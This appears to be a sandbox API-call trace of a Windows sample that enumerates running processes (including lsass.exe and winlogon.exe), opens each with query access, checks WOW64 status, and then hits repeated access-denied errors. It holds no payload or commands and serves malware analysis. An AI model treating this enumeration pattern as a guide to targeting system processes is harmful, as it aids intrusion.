	[0074.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.662] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.662] CloseHandle (hObject=0x224) returned 1
	[0074.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.663] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.663] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.663] CloseHandle (hObject=0x224) returned 1
	[0074.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728958, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.664] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.664] CloseHandle (hObject=0x224) returned 1
	[0074.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.664] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.665] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.665] CloseHandle (hObject=0x224) returned 1
	[0074.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.666] CloseHandle (hObject=0x224) returned 1
	[0074.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.666] CloseHandle (hObject=0x224) returned 1
	[0074.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.666] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.666] CloseHandle (hObject=0x224) returned 1
	[0074.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.667] CloseHandle (hObject=0x224) returned 1
	[0074.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.667] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.668] CloseHandle (hObject=0x224) returned 1
	[0074.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.668] CloseHandle (hObject=0x224) returned 1
	[0074.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.668] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.668] CloseHandle (hObject=0x224) returned 1
	[0074.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.669] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.669] CloseHandle (hObject=0x224) returned 1
	[0074.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.670] CloseHandle (hObject=0x224) returned 1
	[0074.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.670] CloseHandle (hObject=0x224) returned 1
	[0074.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728978, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.670] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.670] CloseHandle (hObject=0x224) returned 1
	[0074.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e838, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.671] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.671] CloseHandle (hObject=0x224) returned 1
	[0074.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.672] CloseHandle (hObject=0x224) returned 1
	[0074.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.672] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.672] CloseHandle (hObject=0x224) returned 1
	[0074.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.673] CloseHandle (hObject=0x224) returned 1
	[0074.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.673] CloseHandle (hObject=0x224) returned 1
	[0074.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.673] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.674] CloseHandle (hObject=0x224) returned 1
	[0074.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.674] CloseHandle (hObject=0x224) returned 1
	[0074.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.674] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.675] CloseHandle (hObject=0x224) returned 1
	[0074.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72eb08, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.675] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.675] CloseHandle (hObject=0x224) returned 1
	[0074.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.676] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.676] CloseHandle (hObject=0x224) returned 1
	[0074.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.676] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.676] CloseHandle (hObject=0x224) returned 1
	[0074.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.677] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.677] CloseHandle (hObject=0x224) returned 1
	[0074.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.677] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.677] CloseHandle (hObject=0x224) returned 1
	[0074.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.678] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.678] CloseHandle (hObject=0x224) returned 1
	[0074.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e6a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.678] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.678] CloseHandle (hObject=0x224) returned 1
	[0074.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e6a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.679] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.679] CloseHandle (hObject=0x224) returned 1
	[0074.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.680] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.681] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
	[0074.682] GetLastError () returned 0x5
